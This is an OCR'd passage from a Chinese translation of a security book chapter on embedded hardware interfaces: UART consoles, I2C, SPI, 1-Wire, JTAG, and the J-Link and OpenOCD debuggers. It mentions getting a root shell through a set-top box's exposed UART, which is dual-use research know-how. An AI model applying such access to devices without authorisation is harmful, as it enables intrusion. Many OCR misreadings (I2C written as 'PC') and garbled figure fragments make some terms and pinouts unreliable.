打交道 。 比 如 ， 该 设备 有 没有 任何 暴露 的 接口 ， 有 没有 用 于 USB 设备 或 存储 卡 的 接口 或 插座 ， 
等 等 。 本 章 稍 后 会 讨论 此 类 接口 。 本 节 关 注 打开 设备 外 壳 看 到 PCB 板 ( 印刷 电路 板 ) 后 可 能 见 
到 的 一 些 东 西 ， 介 绍 设备 常见 硬件 接口 的 基础 知识 ， 之 后 再 进入 有 具体 示例 和 测试 实例 。 
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13.1.1 UART 串 行 接口 


到 目前 为 止 , 从 髋 入 式 设 备 接收 诊断 和 调试 信息 最 常用 到 的 是 UART (通用 异步 收发 器 ) 接 
口 。UART 串 行 接口 一 般 实现 了 RS-232、RS-422 、RS-485 、EIA 等 通信 标准 中 的 一 个 。 不 过 这 些 
通信 标准 只 定义 了 一 些 细节 ， 比 如 信和 号 的 含义 (不 同 的 信号 意味 着 开始 传输 、 停 止 传输 还 是 重 置 
连接 等 )。 这 些 标准 还 规范 了 时 序 ( 数据 传输 速度 应 该 有 多 快 ) 等 方面 ， 有 时 定义 了 接头 的 尺寸 
和 含义 。 如 果 想 了 解 各 种 不 同 的 UART， 了 解 这 些 非常 古老 而 又 有 完整 记录 的 标准 ， 最 好 的 途径 
就 是 互联 网 。 现 在 需要 记 住 的 是 ， 这 类 接口 在 各 种 笛 入 式 设备 中 极为 常见 。 

为 什么 UART 如 此 普遍 ?因为 它 使 用 一 种 简单 的 方式 直接 从 控制 器 和 微 处 理 器 中 接收 数据 ， 
不 需要 经 过 中 间 硬 件 。 把 中 间 硬 件 加 入 微 处 理 器 极其 复杂 , 成 本 必然 增加 。 图 13-1 展示 了 UART 
接口 如 何 直接 与 CPU 相连 。 
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Rx 





串 行 数据 
图 13-1 UART 串口 直接 与 CPU 相连 


在 显卡 、 键盘 、 和 鼠标 、 网 卡 等 成 为 与 计算 机 交互 的 主要 方式 之 前 ,， UART 串口 就 已 经 出 现 了 。 
许多 早期 的 计算 机 系统 都 没有 键盘 、 鼠 标 、 显 示 器 和 视频 输出 ， 唯 一 的 控制 接口 就 是 串口 ， 用 户 
可 以 将 其 与 专用 “ 哑 终 端 ”( 例如 Wyse ) 相连 。 在 许多 年 里 ，UART 串口 都 是 使 用 计算 机 命令 行 
控制 台 的 最 常见 途径 。 事实 上 , 许多 现代 的 Unix 概念 起 源 于 这 些 早期 事物 。 例 如 ，Unix 和 Linux 
的 用 户 大 多 熟悉 终端 在 TTY 上 运行 的 情况 。 这 个 词 本 身 就 来 自 那个 古老 的 年 代 ， 当 时 操作 Unix 
系统 的 方式 是 通过 串口 将 其 与 一 台 TeleTYpe 打字 机 相连 〈 因此 缩写 为 TTY )。 

UART 串口 有 多 种 实现 方法 ,最 简单 的 情况 下 用 三 到 四 根 连接 线 就 够 了 。 这 样 的 简单 性 意味 

着 可 以 非常 便宜 而 轻 量 地 实现 电路 设计 。 因 此 ,几乎 在 所 有 的 能 人 式 系统 中 都 能 找到 UART 接口 ， 
已 通常 由 OEM 直接 集成 到 SoC 芯片 中 。 
有 些 般 入 式 系统 ( 如 机 顶 盒 ) 的 视频 输出 通常 完全 专用 于 上 层 用 户 界面 , 通常 只 有 有 限 的 用 
户 输入 功能 ， 比 如 专用 遥控 器 。 在 这 种 情况 下 , 面向 最 终 市 场 的 产品 并 没有 为 底层 调试 功能 留 下 
多 少 空间 。 因 此 可 以 想象 ,对 开发 者 来 说 隐藏 在 设备 里 的 UART 串口 对 于 调试 和 诊断 是 多 么 有 用 。 
事实 上 ， 绝 大 部 分 消费 级 产品 都 暴露 并 启用 了 这 类 接口 。 
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1. 一 个 暴露 的 串口 意味 着 什么 ? 

通过 一 个 暴露 的 串口 直接 与 谍 入 式 操作 系统 打交道 ， 与 在 芯片 间 的 通信 路 径 上 拦截 、 查 看 、 
算 改 及 生成 数据 有 同样 的 后 果 : 产生 更 多 的 攻击 面 。 第 5 章 中 提 到 ,攻击 目标 的 攻击 面 数 量 直接 
与 该 目标 和 其 他 系统 、 代 码 、 设 备 、 用 户 甚 至 自身 其 他 组 件 的 交互 接口 数量 成 正比 。 关 注 这 些 接 
口 可 以 拓宽 对 整个 设备 攻击 面 的 理解 。 这 一 点 也 适用 于 运行 其 他 系统 的 设备 。 

2. Android 和 Linux 设备 上 暴露 的 UART 串口 

在 基于 Android 的 艇 入 式 系统 中 ,经 常 能 发 现 暴露 的 UART 串口 。 连 接 好 以 后 ， 可 以 通过 它 
直接 访问 底层 操作 系统 。 根 据 本 书 的 讨论 ,最 常用 的 Android 交互 方式 是 ADB。 不 过 , 许多 暴露 
了 UART 的 Android 和 能 和 人 式 系统 内 核 常 在 编译 时 加 入 这 样 编译 选项 : 


CONFIG_SERIAL_MSM 
CONFIG_SERIAL_MSM_CONSODE 


然后 , 诸如 uBoot 和 X-Loader 的 bootloader 还 会 通过 下 面 这 样 的 引导 选项 将 串口 配置 参数 传 
递 给 内 核 : 

"console=ttyMSM2,115200n8" 

此 时 ， 所 有 的 stdout、stderr 和 debug 输出 都 会 被 定位 到 串口 。 如 果 设 备 中 运行 的 是 Android 
或 者 标准 的 Linux， 并 且 login 是 引导 序列 中 的 一 步 ， 还 可 以 看 到 一 个 登录 提示 框 
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注意 ”虽然 这 些 配置 选项 专门 用 于 编译 基于 高 通 MSM 芯片 的 Android， 但 是 其 他 芯片 在 理念 上 
是 一 样 的 。 


通过 这 些 接口 ， 可 以 观察 到 设备 的 启动 过 程 、 输 出 的 调试 和 诊断 信息 ( 想 想 syslog 或 者 
gmesg 的 功能 )， 甚 至 还 能 通过 一 个 命令 行 shell 与 设备 进行 交互 。 图 13-2 就 是 一 台 机 顶 盒 上 的 
UART 引 脚 。 





图 13-2 ”机顶盒 的 引 脚 
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将 图 13-2 所 示 的 引 脚 与 电路 板 上 恰当 的 引 脚 连接 好 以 后 , 就 可 以 获得 设备 中 Android 系统 的 
一 个 root 权限 shell。 将 这 一 技术 用 于 另 一 个 基于 博通 〈Broadcom ) 的 电缆 调试 解 调 器 〈 有 线 电 
视 猫 ) 时 ， 暴 露出 的 则 是 一 个 订 制 的 实时 操作 系统 。 虽 然 博通 的 UART 中 没有 交互 式 shell, 但 
是 对 其 IP 地 址 相关 服务 进行 模糊 测试 时 ，UART 中 会 显示 栈 回 淹 信 息 ， 可 以 将 其 反馈 给 模糊 测 
试 流程 。 该 设备 的 UART 引 脚 如 图 13-3 所 示 。 









































图 13-3” Comcast 博通 设备 的 引 脚 





这 仅仅 是 我 们 研究 中 的 两 个 简单 例子 。 在 许多 其 他 的 设备 中 都 可 以 找到 UART 接口 未 受 保护 
的 问题 。 互 联网 上 有 非常 多 基于 UART 接口 暴露 的 博客 文章 和 安全 会 议 报告 ， 比 如 femtocell、 
OpenWRT Linksys 路 由 器 和 碟 形 卫星 天 线 的 hack， 以 及 电缆 调制 解 调 需 的 漏洞 等 。 

那么 ， 发 现 这 些 接口 以 后 应 该 做 什么 ? 怎么 判断 每 根 引 脚 的 用 途 ? 13.1.4 节 将 介绍 一 些 简单 
的 方法 和 工具 来 解决 这 些 问题 。 现 在 还 需要 了 解 一 些 其 他 的 常见 接口 ， 从 而 把 它们 区 分 开 来 。 








13.1.2 12:C、SPI 和 单 总 线 接口 


前 面 介绍 的 UART 串口 一 般 用 于 人 与 设备 进行 交互 ,而 几乎 所 有 的 般 入 式 设备 都 实现 了 一 些 
更 为 简单 的 串 行 协议 。 与 UART 不 同 , 这 些 串 行 协 议 是 为 了 满足 电路 中 各 个 集成 芯片 互相 通信 的 
需求 。 它 们 可 以 用 极 少 的 引 脚 ( 有 时 候 甚 至 只 需要 一 根 ) 来 实现 ， 因 此 电路 设计 师 可 以 在 电路 板 
上 实现 类 似 于 局 域 网 的 设计 ， 让 所 有 芯片 能 够 互相 通信 。 

这 些 简 单 的 串 行 协议 中 ， 最 常见 的 是 PC 和 SPI。PC 又 写作 DC ( 读 作 “I 平 方 C”)， 是 集 
成 电路 之 间 (Inter-Integrated Circuit ) 的 缩写 ; SPI 是 串 行 外 围 接口 ( Serial Peripheral Interface ) 
总 线 ; 单 总 线 (One-Wire 或 者 1-Wire ) 的 得 名 则 源 于 它 只 需要 一 根 电线 或 者 一 个 引 脚 来 提供 电 
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源 与 通信 通道 。 

在 继续 讨论 之 前 需要 指出 的 是 ， 在 PCB 板 上 ， 并 不 是 任意 两 个 元 件 之 间 的 链 路 都 可 以 承载 
串 行 数据 , 这 远 没 有 想象 中 那么 简单 .许多 集成 芯片 用 一 种 非常 古老 的 方式 与 其 他 芯片 共享 数据 ， 
即 简单 地 变化 各 个 引 脚 的 状态 〈 通 过 相对 高 低 的 电压 值 和 确定 的 规范 标准 来 表示 二 进 制 的 1 和 
0 )。 通 常情 况 下 这 些 引 脚 被 称 为 GPIO， 也 就 是 “通用 目的 输入 输出 ”的 缩写 。 

一 些 引 脚 承载 模拟 信号 ,一些 承 载 数字 信号 。 因 此 ， 有 时 候 需 要 清楚 某 个 集成 电路 与 外 界 通 
信使 用 的 具体 协议 。 通 常情 况 下 , 阅读 这 块 集成 电路 的 手册 或 者 快速 翻阅 其 引 脚 的 规格 说 明 书 即 
可 (这样 就 进入 了 电子 工程 领域 ， 超 出 了 本 书 的 范围 )。 

不 过 事实 上 ,由 于 这 些 串 行 协议 极为 普遍 ， 很 少 需要 了 解 深层 细节 。 实 现 这 些 串 行 协议 的 复 
杂 性 远 低 于 UART， 因 此 可 以 低 成 本 地 集成 到 几乎 所 有 类 型 的 集成 电路 中 , 通过 几 根 引 脚 输出 数 
据 。 在 真实 世界 里 ， 可 以 在 实现 各 种 功能 的 集成 芯片 中 找到 它们 ， 包 括 : 

口 倾斜 /运动 传感器 (加速 马达 ) 

口 时 钟 

口 步 进 电机 

口 舱 机 

口 稳 压 右 

口 A/D (模拟 信号 到 数字 信号 ) 转换 器 
口 温度 传 感 需 

口 数据 存储 芯片 (EEPROM ) 

口 LCD/LED 显示 屏 

口 GPS 接收 器 

每 个 制造 商都 希望 其 生产 的 集成 电路 易于 交互 ,因此 PC 和 SPI 成 为 了 简单 数字 通信 的 事实 
标准 。 例 如, 任天堂 的 Wi 控制 器 使 用 了 TC 进行 串 行 通信 , 用 在 连接 控制 器 与 游戏 主机 的 线 缆 上 。 
在 大 部 分 笔记 本 电脑 中 , 电池 也 是 通过 SPI 和 Tc 向 笔记 本 系统 的 软件 报告 剩余 的 电量 。 在 笔记 
本 电脑 里 ， 温 度 调节 、 电 池 状 态 及 输出 等 逻辑 通常 都 以 软件 的 方式 实现 ， 这 些 软件 走 TC 总 线 
来 控制 电池 。 

每 根 VGA、DVI 和 HDMI 线 及 其 要 连接 的 设备 上 都 有 专门 的 ITC 引 脚 ， 用 于 在 设备 与 显卡 
之 间 建 立 基本 的 通信 信道 。 图 13-4 给 出 了 常见 VGA、HDMI 和 DVI 控制 器 中 的 PC 接口。 

将 一 台新 的 显示 需 插 入 计算 机 时 ,主机 能 准确 了 解 到 显示 器 的 厂商 和 型 号 ,就 是 因为 它 从 视 
频 线 缆 中 两 根 专用 的 FC 引 脚 里 收 到 了 显示 器 发 来 的 信息 。 

就 连 MicroSD 卡 和 SD 卡 也 通过 一 根 SPI 串 行 总 线 来 传输 所 有 的 数据 ! 是 的 ,存储 卡通 过 SPI 
这 种 简单 、 可 扩展 的 老式 串 行 协议 与 计算 机 对 话 。 图 13-5 给 出 了 在 MicroSD 和 SD 卡 接口 中 实 
现 SPI 通信 的 具体 引 脚 。 
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@ ttl © 时 钟 引 即 
图 13-4 VGA、DVI 和 HDMI 中 的 PC 引 脚 
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1 
2 CMD DI 
3 Vssl | vssl 
4 
5 
6 
7 
8 
9 
aMm | sD SPI 
1 8 1 DAT2 x 
2 |cD/DAT3| Cs 
3 CMD D1 
4 VDD | vDD 
5 CLK | SCLK 
6 VSS VSS 
了 











DATO DO 
8 DATI1 X 


图 13-5 MicroSD 卡 和 SD 卡 中 使 用 的 SPI 
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通过 这 些 简单 的 示例 , 相信 你 已 经 意识 到 这 些 串 行 协议 到 底 有 多 么 普遍 了 。 有 一 个 例子 也 许 
和 本 书 主题 最 为 相关 : 智能 手机 的 应 用 处 理 器 与 基带 处 理 器 之 间 也 普遍 使 用 TC 通信 。 事 实 上 ， 
通过 嗅 探 这 条 PC 总 线 中 传输 的 数据 ，George Hotz (又 名 GeoHot ) 才能 开发 出 对 iPhone 的 第 一 
个 越狱 ; 通过 嗅 探 MacBook 电池 中 内 建 的 电量 控制 器 经 TC 收 到 的 数据 ，Charlie Miller 博士 才能 
对 其 进行 逆向 工程 ， 了 解 苹果 笔记 本 控制 电量 的 原理 。 


13.1.3 JTAG 


在 信息 安全 领域 ，JTAG 这 个 热 词 似乎 具有 丰富 的 含义 。 许 多 人 都 在 并 不 了 解 这 个 词 真 实 含 
义 的 情况 下 随意 使 用 过 它 , 因为 它 的 概念 看 起 来 真 的 非常 简单 : 只 是 通过 另外 一 台 计 算 机 调试 芯 
片 的 一 种 方法 而 已 。 然 而 ， 真 实情 况 可 能 与 想象 中 的 有 所 不 同 。 

前 面 已 经 介绍 了 集成 电路 如 何 使 用 简单 串 行 协议 相互 通信 或 与 外 设 通 信 。 我 们 还 了 解 到 , 开 
发 者 经 常 使 用 这 些 串 口 与 操作 系统 和 bootloader 进行 交互 ， 或 者 接收 调试 输出 信息 。 这 些 交 互 和 
输出 当然 很 有 用 ,但 舱 入 式 开发 者 还 需要 男 一 个 非常 重要 的 功能 : 调试。 

使 用 UART 的 前 提 是 在 目标 设备 中 运行 用 于 实现 交互 式 接口 ( 比如 shell 或 交互 式 bootloader ) 
的 专门 代码 。 和 能 人 式 开发 者 应 该 怎样 了 解 处 理 器 未 执行 任何 代码 时 的 状态 , 尤其 是 在 其 尚未 执行 
特定 代码 或 者 暂停 执行 时 ?在 般 入 式 系 统 中 ,这 并 不 仅仅 是 安装 一 个 软件 调试 器 那么 简单 比如， 
如 果 被 调试 设备 运行 的 是 一 个 实时 操作 系统 ， 其 中 没有 用 户 态 空间 和 多 进程 等 概念 ， 应 该 怎么 
办 ? 如 果 被 调试 目标 运行 的 是 一 个 实时 操作 系统 或 者 裸 机 执行 文件 ,只 有 一 个 单独 的 执行 文件 镜 
像 在 运行 ， 那 么 就 只 有 一 种 选择 : 使 用 像 JTAG 这 样 的 硬件 调试 接口 。 

JTAG 的 相关 标准 和 规范 已 经 超出 了 本 章 的 讨论 范围 , 不 过 还 是 需要 进行 说 明 。JTAG 对 应 的 
是 IEEE 1149.1 号 标准 “Standard Test Access Port and Boundary Scan Architecture”。 该 标准 来 自 一 
个 名 为 “联合 测试 行动 小 组 ”( Joint Test Action Group ) 的 组 织 , 由 OEM 和 开发 者 团体 共同 组 成 。 
JTAG 以 这 个 组 织 命名 ， 而 非 该 标准 。 

这 里 需要 记 住 一 个 很 重要 的 细节 , 它 可 以 消除 对 这 个 技术 的 误解 和 滥用 : JTAG 是 一 个 定义 
规范 的 标准 ， 但 是 并 未 规定 应 该 怎样 实现 软件 调试 。 开 发 者 和 信息 安全 社区 经 常 使 用 这 个 词 但 
对 其 理解 其 少 。 只 有 认识 准确 ， 开 发 者 和 研究 人 员 才 能 用 它 有 效 地 调试 般 入 式 软件 ， 找 到 其 中 
的 漏洞 。 

1. JTAG 的 神话 

对 JTAG 最 大 的 误解 是 认为 它 对 软件 调试 部 分 进行 了 高 度 标准 化 。 事 实 上 ， 这 个 标准 只 定义 
了 用 于 调试 和 管理 的 一 个 双向 通信 渠道 。 这 里 的 “调试 ”并 非 平时 软件 工作 者 熟悉 的 “观察 程序 
执行 ”， 而 是 一 个 电子 工程 场景 下 的 概念 : 了 解 所 有 的 芯片 是 否 都 已 经 就 位 ， 检 查 不 同 芯 片 的 引 
脚 状 态 , 甚至 提供 逻辑 分 析 仪 的 基本 功能 。 这 些 电 子 工程 意义 上 的 底层 调试 能 力 为 高 层 软 件 调试 
功能 提供 了 能 力 文 持 ， 下 面 进行 解释 。 

事实 上 ，JTAG 是 一 个 描述 芯片 、 集 成 电路 或 微 处 理 器 中 某 个 特性 的 通用 词汇 。 对 固件 和 软 
件 调 试 来 说 ， 它 更 像 是 汽车 的 变速 器 。 抽 象 地 说 ， 变 速 器 在 汽车 中 改变 齿轮 的 运转 。 然 而 ,不 同 
的 汽车 制造 商 生 产 的 变速 器 在 结构 上 都 有 所 不 同 ， 因 此 维修 、 拆 解 和 诊断 也 变 得 错综复杂 。 
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作为 标准 ，JTAG 优先 对 这 些 底层 特性 和 功能 进行 规范 化 ， 但 并 没有 专门 说 明 软 件 调试 协议 
的 数据 应 该 是 怎样 的 。 从 软件 的 角度 来 看 ， 许 多 JTAG 片 内 调试 器 (On-Chip Debugger，OCD ) 
在 实现 上 趋 于 雷同 ， 并 提供 相同 的 最 小 功能 集 。 绝 大 部 分 JTAG 实现 都 提供 了 这 些 核心 功能 : 单 
步 、 断 点 、 重 启 、 监 视点 、 寄 存 右 查看 和 边界 扫描 等 。 此 外 ， 这 些 设备 上 的 大 部 分 JTIAG 引 脚 标 
签 使 用 相同 的 标记 和 缩写 。 因 此 从 功能 的 角度 来 看 ， 也 很 容易 导致 对 JTAG 的 误解 。 

JTAG 标准 定义 了 5 个 用 于 通信 的 标准 引 脚 ,在 PCB 板 丝印 层 上 以 及 芯片 (或 设备 ) 的 规格 
书 中 也 许 会 看 到 它们 : 

口 TDO: 测试 数据 输出 

口 TDI: 测试 数据 输入 

口 TMS: 测试 模式 选择 

口 TCK: 测试 时 钟 

口 TRST: 测试 重 置 

图 13-6 展示 了 在 不 同 设备 上 使 用 的 多 种 标准 JTAG 接头 。 











14 针 接头 20 针 接头 
Vsup GND Vtref Vsup 
nTRST GND nTRST GND 
TDI GND TDI GND 
TMS GND TMS GND 
TCK GND TCK GND 
TDO nSRST RTCK GND 
Vtref GND TD0 GND 
nSRST GND 
DGBRQ GND 
DGBACK- GND 





图 13-6 JTAG 接头 图 例 


引 脚 名 基本 上 说 明了 它们 的 用 途 。 搞 软件 的 人 可 能 马上 会 认为 JTAG 作为 标准 不 仅 定义 了 引 
脚 ， 还 定义 了 引 脚 之 间 的 通信 ; 但 事实 并 非 如 此 。 在 软件 和 固件 调试 方面 ，JTAG 标准 仅仅 定义 
了 2 个 引 脚 用 于 数据 传输 : 

口 TDO: 测试 数据 输出 

口 TDI: 测试 数据 输入 

接 下 来 ,该 标准 定义 了 在 这 些 引 脚 之 上 传输 的 一 些 命令 及 其 格式 ， 用 于 实现 更 多 的 JTAG 功 
能 ， 但 是 并 没 要 求 传输 这 些 数据 应 该 用 什么 类 型 的 串 行 协议 。JTAG 还 指明 了 与 JTAG 总 线 相连 
的 设备 不 同 的 运行 模式 : 
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口 BYPASS 模式 : 简单 地 将 来 自 TDI 的 数据 传递 给 TDO 

口 EXTEST ( 外 部 测试 ) 模式 : 从 TDI 接收 指令 ， 读 取 外 部 引 脚 状态 信息 ， 传 递 给 TDO 

口 INTEST (内 部 测试 ) 模式 : 读 取 内 部 状态 信息 ,传递 给 TDO; 还 可 以 做 “其 他 ”用 户 自 
定义 的 内 部 事务 

对 于 所 有 基于 JTAG 数据 引 脚 的 软件 或 固件 ,其 调试 通信 和 都 基于 厂商 对 INTEST 模式 JTAG 
通信 的 定制 实现 。 事 实 上 ， 这 也 是 软件 调试 者 以 及 逆向 工程 师 和 漏洞 研究 人 员 最 关心 的 部 分 。 
这 些 在 芯片 与 调试 器 之 间 传 输 的 软件 或 固件 调试 信息 都 是 上 面 所 讲 的 定制 实现 ， 与 JTAG 规范 
本 身 无 关 。 

另 一 个 对 JTAG 的 常见 误解 ， 是 认为 它 直接 与 某 一 个 处 理 器 相连 ， 或 者 认为 它 专门 用 于 调试 
单一 的 目标 。 事 实 上 ，JTAG 本 身 产生 于 一 种 叫 作 边界 扫描 的 技术 。 这 种 技术 将 PCB 板 上 的 多 块 
芯片 串 接 到 一 起 进行 底层 诊断 ， 比 如 检查 引 脚 状态 ( 前面 提 到 的 EXTEST 模式 )， 测 量 电 量 ， 甚 
至 分 析 逻 辑 。 因 此 ，JTAG 在 本 质 上 意味 着 将 多 块 芯 片 连接 起 来 。 图 13-7 说 明了 多 块 芯 片 如 何 被 
连接 起 来 形成 一 条 JTAG 总 线 。 
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图 13-7 串 接 形成 一 条 JTAG 总 线 


同样 地 ，JTAG 规范 设置 了 一 个 主 设备 和 多 个 从 设备 ， 因 此 它 支 持 将 多 个 处 理 咒 不 以 特定 先 
后 顺序 地 用 菊花 链 串 起 来 。 主 设备 通常 是 调试 器 便 件 (比如 PC 和 JTAG 调试 器 适配器 ) 或 者 诊 
断 硬件 , PCB 板 上 所 有 的 芯片 则 通常 是 从 设备 。 对 于 逆向 工程 师 来 说 ， 了 解 这 个 菊花 链 连 接 很 重 
要 ， 因 为 商业 产品 中 的 JTAG 接口 往往 既 与 核心 处 理 器 相连 ， 也 和 外 设 控制 器 (比如 蓝牙 、 以 太 
网 和 其 他 串 行 设备 ) 相连 。 知 道 了 这 个 情况 , 在 后 面 配置 调试 器 工具 和 阅读 调试 器 文档 时 可 以 避 
免 不 少 挫折 。 

此 外 ，JTAG 规范 并 不 指明 设备 之 间 的 具体 顺序 ， 从 设备 也 绝 不 会 自己 引导 一 个 通信 会 话 ， 
理解 这 一 点 有 助 于 使 用 和 检查 JTAG 设备 。 比 如 ， 可 以 确定 手中 的 调试 器 是 链 上 唯一 的 主 设备 。 
图 13-8 展示 了 连接 上 一 个 主 设备 后 整个 通信 和 链 路 的 状态 。 
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图 13-8 ”JTAG 菊花 链 





现在 可 以 意识 到 ，JTAG 主要 用 于 电子 工程 意义 上 的 调试 ， 而 软件 开发 者 、 逆 向 工程 师 和 漏 
洞 研究 者 主要 关心 的 还 是 如 何在 设备 上 调试 软件 或 固件 。 在 这 个 方面 ，JTAG 规范 只 是 宽松 地 定 
义 了 引 脚 及 其 标签 ， 其 中 的 数据 通过 串 行 协议 进行 传输 。 

JTAG 规范 并 未 要 求 使 用 哪 种 串 行 协议 ， 也 没有 定义 所 传输 数据 的 编码 格式 。 但 是 各 种 各 样 
的 处 理 需 中 都 实现 了 JTAG， 这 是 怎么 做 到 的 呢 ? 关键 在 于 各 有 各 的 具体 实现 ， 这 也 是 开发 者 社 
区 的 主要 误解 所 在 。 

在 JTAG 中 , 固件 和 软件 调试 可 以 使 用 不 同 的 数据 格式 ， 甚 至 使 用 不 同 的 连 线 方式 。 比 如 德 
州 仪器 公司 的 MSP430 系列 微 处 理 器 ， 其 JTAG 实现 使 用 的 就 是 一 个 名 为 Spy-Bi-Wire 的 串 行 通 
信 协 议 。 传 统 的 JTAG 实现 需要 使 用 4 或 $ 根 线 ， 而 这 个 协议 只 使 用 2 根 。 如 果 一 个 设备 使 用 了 
MSP430, 即便 其 PCB 板 上 有 一 个 接口 被 标记 为 JIAG 或 者 有 JTAG 引 肢 标签, JTAG 连接 的 串 行 
引 脚 也 会 使 用 Spy-Bi-Wire。 因 此 ， 硬 件 调试 句 要 将 数据 传递 给 软件 调试 器 ， 先 要 理解 这 些 引 脚 
配置 及 其 串 行 协议 〈 见 图 13-9 )。 

















































































































Poem 
Re 
二 + 一 V/A DW 
一 e7 
一 i (02 ee WG, 
10nF”T~ TT 0.1nF 
47K9 六 MSP430Fxxx 
JTAG | 
RST/NMI/SBWTDIO 
R2 
3309 
TESTSBWTCK 
QL. [| Vss/A\ss/D\ss 

















图 13-9 Spy-Bi-Wire 的 接线 方式 
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图 13-9 中 , 左边 是 一 个 传统 的 14 针 JTAG 接口 , 但 是 它 只 有 2 根 线 通过 Spy-Bi-Wire 与 右边 
的 MSP430 处 理 器 相连 ( 分 别 是 RSTNMISBWTDIO 和 TESTSBWTCK )。 除 了 物理 连 线 方式 的 
差异 , 采用 的 电线 线路 协议 ( 也 就 是 INTEST 用 户 定义 节 中 通过 TDO 和 TDI 引 脚 的 调试 数据 流 ) 
有 时 候 也 不 同 。 因 此 , 与 被 调试 对 象 进行 交互 的 调试 软件 也 有 所 不 同 。 这 就 导致 不 同 的 设备 有 不 
同 的 定制 调试 线 缆 、 调 试 硬件 和 调试 软件 。 

不 要 被 上 面 的 内 容 吓 到 ,我 们 只 是 想 解 释 一 些 背 景 情况 ， 以 防 读者 误 以 为 JTAG 是 一 个 高 度 
标准 化 的 通用 调试 银 弹 ， 从 而 在 实际 操作 时 失望 。 了 解 JTAG 的 这 些 情 况 后 ， 接 下 来 看 看 需要 哪 
些 工 具 及 其 原因 。 

2. JTAG 巴 别 鱼 

幸运 的 是 ， 有 几 家 公司 意识 到 ， 面 对 各 种 各 样 的 JTAG 实现 ， 人 们 会 需要 巴 别 鱼 "。Segger、 
Lauterbach 和 IAR 等 厂商 生产 了 基于 PC 的 软件 和 灵活 的 硬件 设备 ， 用 于 完成 这 些 神奇 的 翻译 工 
作 。 因 此 ， 使 用 其 中 一 台 设 备 就 可 以 与 各 类 JTAG 硬件 打交道 。 

JTAG 适配器 

这 种 通用 的 JTAG 调试 器 与 那些 通用 的 电视 遥控 器 非 常 像 。 生产 这 些 调 试 器 的 厂商 会 公布 其 
长 期 支持 的 设备 列表 ,其 中 包含 JTAG 调试 器 可 以 识别 并 支持 的 成 千 上 万 种 集成 电路 和 微 处 理 器 
的 序列 号 。 和 电视 遥控 器 类 似 ， 特 性 越 多 、 可 编程 性 越 强 、 支 持 设 备 数量 越 多 ,调试 器 的 价格 就 
越 高 。 在 下 订单 购买 一 款 JTAG 调试 器 之 前 ， 很 重要 的 一 点 是 要 确定 它 支 持 你 想 调 试 的 设备 。 

图 13-10 所 示 的 Segger J-Link 也 许 是 最 流行 的 JTAG 调试 器 ， 也 是 最 适合 绝 大 部 分 读者 的 一 
款 。 它 相对 来 说 比较 便宜 ， 但 是 支持 的 设备 数量 繁多 ， 因 此 成 为 开发 者 们 的 最 爱 。J-Link 有 不 同 
的 型 号 ， 主 要 是 特性 上 有 所 不 同 ， 但 是 核心 的 通用 调试 功能 是 一 样 的 。 




























































































图 13-10 Segger 公 司 的 本 Link 调试 器 











QD Babel fish,《 银 河 系 漫游 指南 》 中 提 到 的 一 种 通用 翻译 器 。 一 一 译 者 注 
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通过 USB 接口 将 J-Link 盒子 与 计算 机 相连 ， 然 后 通过 排 线 或 者 自制 跳 线 将 其 与 要 调试 芯片 
相连 〈 13.1.4 节 会 进一步 介绍 )， 就 可 以 开始 调试 了 。 接 下 来 ，Segger 的 软件 会 与 J-Link 设备 互 
动 , 使 用 它 控制 目标 设备 。 J-Link 软件 甚至 可 以 充当 GDB 服务 端的 角色 , 以 便于 使 用 熟悉 的 GDB 
终端 来 调试 芯片 。 图 13-11 演示 了 将 GDB 附着 到 Segger J-Link 调试 服务 端 上 的 情形 。 


see 人 上 | -| SEGGER J-Link GDB Server V4.58a = OE 
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Reading 253 bytes 四 address Dx00002500 
Read 3 bytes 四 address 0x000025ED (Data = Ox990322) 
Reading 2 btes @ address Dx2000FFOO 


Reading Hy bytes 
VARHING: Failed to 3 2 SR DxFFEFFFOO 


es @ address 斌 00000000 
Read 3 bytes 9 addzess ee a -= 0z0000SE) 
ee oa 3 3 address 0 

Read 3 b sae SaoonED (hata = DxF2C203}) 
Reading 53 bytes @ address 
Read 3 bytes 9 address ode (Data = Ox255ABF) 


J-Link ARM V4.58a 


TT 到 及 。 EPSR 1] A 
好 :DNTROL Ge "AULTHASK | 外 日。 PRIMASK 


SYSRESETREQ & VECTRESET bit 


图 13-11 Segger J-Link 与 GDB 交互 的 截屏 





除了 最 为 流行 的 J-Link 调试 器 ， 还 有 一 些 其 他 的 工业 级 调试 器 ， 比 如 非常 先进 的 Lauterbach 
产品 ， 自 称 支持 的 设备 数量 最 多 。Lauterbach 的 调试 器 确实 相当 不 错 ， 但 是 价格 过 高 。 

OpenOCD 

另 一 个 经 常 被 提起 的 JTAG 方案 是 OpenOCD ， 它 是 “开放 式 片 内 调试 器 ”的 缩写 。 之 前 介 
绍 的 商业 工具 将 所 有 需要 的 软件 和 硬件 打包 在 一 起 , 拿 到 后 就 可 以 立即 开始 与 设备 上 的 JTAG 协 
同 工 作 。 与 此 不 同 的 是 ，OpenOCD 仅仅 是 一 份 开源 的 软件 ， 其 目的 是 支持 各 类 JTAG 适配器 和 
目标 设备 , 让 用 户 可 以 通过 一 个 标准 的 GDB 调试 器 界面 (或 者 其 他 与 GDB 服务 端 兼容 的 任何 界 
面 ) 来 操作 适配器 并 进行 调试 。 

回忆 一 下 之 前 的 内 容 ，JTAG 适配器 本 身 会 负责 处 理 所 有 来 往 于 芯片 的 信号 ， 翻 译 它们 并 通 
过 USB 、 串 口 或 者 并 口 连接 将 其 传递 给 PC。 接 下 来 ， 需 要 有 一 款 软件 通过 电线 线路 协议 来 理解 
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et 


和 解析 协议 ， 并 将 数据 翻译 成 调试 器 所 能 理解 的 形式 。OpenOCD 就 是 这 样 一 款 软件 。 在 商业 方 





案 中 ， 这 种 软件 一 般 与 适 配 吉 硬件 打包 在 一 起 销售 。 


而 OpenOCD 则 通常 和 不 包含 软件 的 JTAG 适配器 一 起 使 用 ， 例 如 Olimex 的 适配器 、 
FlySwatter、Wiggler 甚至 Bus Pirate ( 13.3.2 节 会 进一步 介绍 )。OpenOCD 还 能 和 一 些 商 业 适 配器 





配套 使 用 ， 例 如 Segger J-Link。 








如 果 已 经 知道 了 调试 目标 的 引 脚 分 布 ， 所 用 的 JTAG 适配器 也 支持 ， 接 线 也 准确 可 靠 , 并 且 





























针对 这 些 情况 配置 好 了 OpenOCD ， 接 下 来 使 用 OpenOCD 会 非常 容易 。 可 以 通过 apt-get 等 软件 








下 载 器 下 载 并 安装 ， 然 后 通过 命令 行 启动 ， 如 下 所 示 : 


[s7ephen@xip ~]$ openocd 


Open On-Chip Debugger 0.5.0-dev-00141-g33e5dd1 (2010-04-02-11:14) 


Licensed under GNU GPL v2 
